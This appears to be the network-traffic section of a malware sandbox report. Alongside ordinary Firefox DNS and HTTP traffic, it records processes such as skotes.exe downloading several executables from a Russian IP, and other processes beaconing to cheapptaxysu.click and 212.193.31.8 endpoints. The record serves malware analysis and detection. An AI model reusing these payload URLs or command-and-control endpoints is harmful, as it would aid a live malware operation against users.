                      GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                      host: getpocket.cdn.mozilla.net
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      sec-fetch-dest: empty
                      sec-fetch-mode: cors
                      sec-fetch-site: cross-site
                      if-none-match: W/"55fb-EbQRG15WWp3OJ2XVah21nUrSQno"
                      te: trailers
                    • US
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • FR
                      GET
                      https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                      host: youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • FR
                      GET
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                      host: www.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • US
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • US
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      2600:1901:0:524c::
                    • US
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                    • US
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                      Response
                      youtube.com
                      IN AAAA
                      2a00:1450:4007:805::200e
                    • US
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                    • US
                      DNS
                      www.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.youtube.com
                      IN A
                      Response
                      www.youtube.com
                      IN CNAME
                      youtube-ui.l.google.com
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                    • US
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN A
                      Response
                      shavar.prod.mozaws.net
                      IN A
                      44.228.225.150
                      shavar.prod.mozaws.net
                      IN A
                      44.240.87.158
                      shavar.prod.mozaws.net
                      IN A
                      52.40.120.141
                    • US
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN A
                    • US
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.149.100.209
                    • US
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • US
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                    • US
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                      Response
                    • US
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                      Response
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                    • US
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                    • US
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                    • US
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                    • US
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      34.160.144.191
                    • US
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      2600:1901:0:92a9::
                    • US
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                    • US
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN AAAA
                      Response
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:808::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:810::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                    • FR
                      GET
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      firefox.exe
                      Remote address:
                      142.250.179.110:443
                      Request
                      GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                      host: consent.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      cookie: SOCS=CAAaBgiArZ27Bg
                      cookie: YSC=BVtFuk4jo0g
                      cookie: __Secure-YEC=CgtLNmJKVlZjb0kzSSjA8527BjIKCgJHQhIEGgAgXw%3D%3D
                      cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgXw%3D%3D
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • US
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • US
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • US
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                    • US
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN AAAA
                      Response
                      www.google.com
                      IN AAAA
                      2a00:1450:4007:80c::2004
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                      Response
                      consent.youtube.com
                      IN AAAA
                      2a00:1450:4007:818::200e
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                    • US
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                    • US
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      35.244.181.201
                    • US
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                    • US
                      DNS
                      prod.balrog.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN AAAA
                    • US
                      DNS
                      ciscobinary.openh264.org
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      ciscobinary.openh264.org
                      IN A
                      Response
                      ciscobinary.openh264.org
                      IN CNAME
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com
                      a17.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com.mdc.edgesuite.net
                      a17.rackcdn.com.mdc.edgesuite.net
                      IN CNAME
                      a19.dscg10.akamai.net
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                    • US
                      DNS
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN A
                      Response
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                    • DNS (US)
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN A
                    • GET (GB)
                      http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                      firefox.exe
                      Remote address:
                      88.221.134.155:80
                      Request
                      GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                      Host: ciscobinary.openh264.org
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      Accept: */*
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Connection: keep-alive
                      Response
                      HTTP/1.1 200 OK
                      Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                      ETag: 85430baed3398695717b0263807cf97c
                      Content-Length: 453023
                      Accept-Ranges: bytes
                      X-Timestamp: 1731034347.00215
                      Content-Type: application/zip
                      X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                      Cache-Control: public, max-age=92616
                      Expires: Mon, 23 Dec 2024 04:14:13 GMT
                      Date: Sun, 22 Dec 2024 02:30:37 GMT
                      Connection: keep-alive
                    • DNS (US)
                      a19.dscg10.akamai.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      a19.dscg10.akamai.net
                      IN AAAA
                      Response
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:869b
                      a19.dscg10.akamai.net
                      IN AAAA
                      2a02:26f0:a1::58dd:86d1
                    • DNS (US)
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • DNS (US)
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                      Response
                      redirector.gvt1.com
                      IN A
                      172.217.20.174
                    • DNS (US)
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN A
                    • DNS (US)
                      redirector.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      redirector.gvt1.com
                      IN AAAA
                      Response
                      redirector.gvt1.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • DNS (US)
                      r4---sn-aigzrnsz.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r4---sn-aigzrnsz.gvt1.com
                      IN A
                      Response
                      r4---sn-aigzrnsz.gvt1.com
                      IN CNAME
                      r4.sn-aigzrnsz.gvt1.com
                      r4.sn-aigzrnsz.gvt1.com
                      IN A
                      74.125.175.169
                    • DNS (US)
                      r4.sn-aigzrnsz.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r4.sn-aigzrnsz.gvt1.com
                      IN A
                      Response
                      r4.sn-aigzrnsz.gvt1.com
                      IN A
                      74.125.175.169
                    • DNS (US)
                      r4.sn-aigzrnsz.gvt1.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      r4.sn-aigzrnsz.gvt1.com
                      IN AAAA
                      Response
                      r4.sn-aigzrnsz.gvt1.com
                      IN AAAA
                      2a00:1450:4009:1b::9
                    • DNS (US)
                      firefox-settings-attachments.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      firefox-settings-attachments.cdn.mozilla.net
                      IN A
                      Response
                      firefox-settings-attachments.cdn.mozilla.net
                      IN CNAME
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • DNS (US)
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • DNS (US)
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • DNS (US)
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • DNS (US)
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • GET (RU)
                      http://31.41.244.11/files/burpin1/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/burpin1/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:49 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 4438776
                      Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                      Connection: keep-alive
                      ETag: "675784f0-43baf8"
                      Accept-Ranges: bytes
                    • GET (RU)
                      http://31.41.244.11/files/geopoxid/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/geopoxid/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:00 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1861632
                      Last-Modified: Thu, 19 Dec 2024 20:35:58 GMT
                      Connection: keep-alive
                      ETag: "676483ae-1c6800"
                      Accept-Ranges: bytes
                    • GET (RU)
                      http://31.41.244.11/files/zhigarko/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/zhigarko/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:14 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 439296
                      Last-Modified: Sat, 21 Dec 2024 08:14:10 GMT
                      Connection: keep-alive
                      ETag: "676678d2-6b400"
                      Accept-Ranges: bytes
                    • GET (RU)
                      http://31.41.244.11/files/kardanvalov88/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/kardanvalov88/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:18 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 605696
                      Last-Modified: Thu, 12 Dec 2024 15:01:10 GMT
                      Connection: keep-alive
                      ETag: "675afab6-93e00"
                      Accept-Ranges: bytes
                    • GET (RU)
                      http://31.41.244.11/files/martin/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/martin/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:22 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 4457984
                      Last-Modified: Sun, 22 Dec 2024 02:13:51 GMT
                      Connection: keep-alive
                      ETag: "676775df-440600"
                      Accept-Ranges: bytes
                    • DNS (US)
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • DNS (US)
                      cheapptaxysu.click
                      ef0449806c.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      cheapptaxysu.click
                      IN A
                      Response
                      cheapptaxysu.click
                      IN A
                      172.67.177.88
                      cheapptaxysu.click
                      IN A
                      104.21.67.146
                    • POST (FR)
                      https://play.google.com/log?hasfast=true&authuser=0&format=json
                      firefox.exe
                      Remote address:
                      216.58.214.174:443
                      Request
                      POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                      host: play.google.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      referer: https://consent.youtube.com/
                      content-type: text/plain;charset=UTF-8
                      content-length: 777
                      origin: https://consent.youtube.com
                      sec-fetch-dest: empty
                      sec-fetch-mode: no-cors
                      sec-fetch-site: cross-site
                      te: trailers
                    • DNS (US)
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN A
                      Response
                      play.google.com
                      IN A
                      216.58.214.174
                    • POST (US)
                      https://cheapptaxysu.click/api
                      ef0449806c.exe
                      Remote address:
                      172.67.177.88:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: cheapptaxysu.click
                      Response
                      HTTP/1.1 403 Forbidden
                      Date: Sun, 22 Dec 2024 02:31:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      X-Frame-Options: SAMEORIGIN
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsxBC30Z6k79B4PY1TkUxzET1r4vQRYifBa%2ByrfGGgK3cjPK5lVwTkYRT52BPIZvSutQrTEJrPD%2FxNW0fsgILNu6McmApA4Dovq5jlZTmpD5Ki6MZuoiXZTDofi3rhvgTp2QEQ4%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f5cb1c3fa10ef56-LHR
                    • POST (US)
                      https://cheapptaxysu.click/api
                      ef0449806c.exe
                      Remote address:
                      172.67.177.88:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Cookie: __cf_mw_byp=.bmSsGrZrbfsHxUAF4YuOnltV.TMahgqUlmYN4mupfY-1734834673-0.0.1.1-/api
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 50
                      Host: cheapptaxysu.click
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:31:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Set-Cookie: PHPSESSID=21qtudenp4eh8ko53e024dvibo; expires=Wed, 16 Apr 2025 20:17:52 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      X-Frame-Options: DENY
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      cf-cache-status: DYNAMIC
                      vary: accept-encoding
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2FhiIC3N8%2FMQ4WwLswkhSTyuXGDU8X3JvgGtnBRsX%2B6APjHWhfaL00Ruy32zHerzjYGc3Dg2mq4aKBl%2Bifl4rRd0t98p9HsUQjhrfbOSJI3ZPo8FgP%2BfCZC6z5Zy1%2Bqefh%2Be4A%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f5cb1c45aa2ef56-LHR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=67539&min_rtt=48114&rtt_var=32925&sent=15&recv=10&lost=0&retrans=0&sent_bytes=8133&recv_bytes=1060&delivery_rate=224780&cwnd=253&unsent_bytes=0&cid=2fa6c3d1abd8c8cf&ts=419&x=0"
                    • DNS (US)
                      play.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      play.google.com
                      IN AAAA
                      Response
                      play.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                    • POST (HU)
                      http://212.193.31.8/3ofn3jf3e2ljk2/index.php
                      Gxtuum.exe
                      Remote address:
                      212.193.31.8:80
                      Request
                      POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 212.193.31.8
                      Content-Length: 4
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:31:18 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 8
                      Content-Type: text/html; charset=UTF-8
                    • POST (HU)
                      http://212.193.31.8/3ofn3jf3e2ljk2/index.php
                      Gxtuum.exe
                      Remote address:
                      212.193.31.8:80
                      Request
                      POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 212.193.31.8
                      Content-Length: 156
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:31:19 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 7
                      Content-Type: text/html; charset=UTF-8
                    • DNS (US)
                      drive.google.com
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      drive.google.com
                      IN A
                      Response
                      drive.google.com
                      IN A
                      142.250.75.238
                    • GET (FR)
                      https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      df1fc80896.exe
                      Remote address:
                      142.250.75.238:443
                      Request
                      GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                      User-Agent: FileDownloader
                      Host: drive.google.com
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 303 See Other
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Sun, 22 Dec 2024 02:31:26 GMT
                      Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      Strict-Transport-Security: max-age=31536000
                      Content-Security-Policy: script-src 'report-sample' 'nonce-QGp1q-9Gt_LgMXUrhlIttw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Cross-Origin-Opener-Policy: same-origin
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    • DNS (US)
                      c.pki.goog
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      c.pki.goog
